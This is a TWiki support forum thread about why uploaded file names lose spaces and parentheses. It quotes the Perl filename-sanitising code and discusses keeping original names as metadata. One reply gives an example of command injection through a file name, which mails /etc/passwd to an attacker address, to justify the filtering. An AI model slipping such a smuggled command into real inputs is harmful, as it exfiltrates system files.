Tags:
create new tag
view all tags

Question

Uploaded files have their names changed. Spaces and parentheses, in particular, are stripped out.

  • e.g., "03-426, 26-Apr-03 (ABC).doc" -> "03-42626-Apr-03ABC.doc"
I have not been able to find anything about this online. Am I missing something?

  • TWiki version: 01 Feb 2003
  • Perl version: 5.6.1
  • Web server & version: Apache 1.3.23
  • Server OS: Linux (Red Hat)
  • Web browser & version: MIE 5.5
  • Client OS: Win Me

-- AlexLane - 27 Apr 2003

Answer

This is controlled by the following code in CVSget:bin/upload, ensuring valid filenames on all platforms and when used in a URL without special encoding:

        # Delete unwanted characters from filename, with I18N
        my $nonAlphaNum = "[^${TWiki::mixedAlphaNum}" . '\._-]+';
        $fileName =~ s/${nonAlphaNum}//go;
        $fileName =~ s/$TWiki::uploadFilter/$1\.txt/goi;  # apply security filter

-- PeterThoeny - 30 Apr 2003

In this regard, I have a question and a comment.

Question: Could you summarize (or point to a source that summarizes) what risks one faces by commenting out the line in the code that strips out non-alpha chars?

Comment: I've worked some with a groupware application called PHProjekt, which resembles TWiki in that it has a feature to permit file uploads/downloads. What PHProjekt does is mangle the file name so that the name in the directory is something unintelligible, but users see the real file name in their browsers.

So, how difficult would it be to do something similar in TWiki, i.e., to retain and store the original file name as metadata, for purposes of display and download, so that for example, the file This file has a corporate name format.doc is stored as Thisfilehasacorporatenameformat.doc but shown on the page with its original name and downloaded similarly? Would this be implementable as a Plugin?

-- AlexLane - 13 May 2003

On your Question: There are several reasons: 1. The file needs to have a valid name on all platforms where TWiki is being installed. 2. An attached file may only contain characters valid in a URL since it can be referenced by URL, e.g. %ATTACHURL%/picture.jpg. 3. Security precaution to prevent attacks like file with odd chars; mail /etc/passwd hacker@evilplace.org. 4. Ease of implementation, e.g. no extra handling for files with spaces.

On your Comment: Certainly a possibility. See attached sample file testfilewithspace.txt, click on Diffs to see the topic meta data. The path attribute contains the original file name with space. TWiki could be tweaked to return test%20file%20with%20space.txt

-- PeterThoeny - 16 May 2003

Topic attachments
I Attachment History Action Size Date Who Comment
Texttxt testfilewithspace.txt r1 manage 0.1 K 2003-05-16 - 06:27 PeterThoeny File with space in name
Edit | Attach | Watch | Print version | History: r5 < r4 < r3 < r2 < r1 | Backlinks | Raw View | Raw edit | More topic actions
Topic revision: r5 - 2003-05-16 - PeterThoeny
 
  • Learn about TWiki  
  • Download TWiki
This site is powered by the TWiki collaboration platform Powered by Perl Hosted by OICcam.com Ideas, requests, problems regarding TWiki? Send feedback. Ask community in the support forum.
Copyright © 1999-2024 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.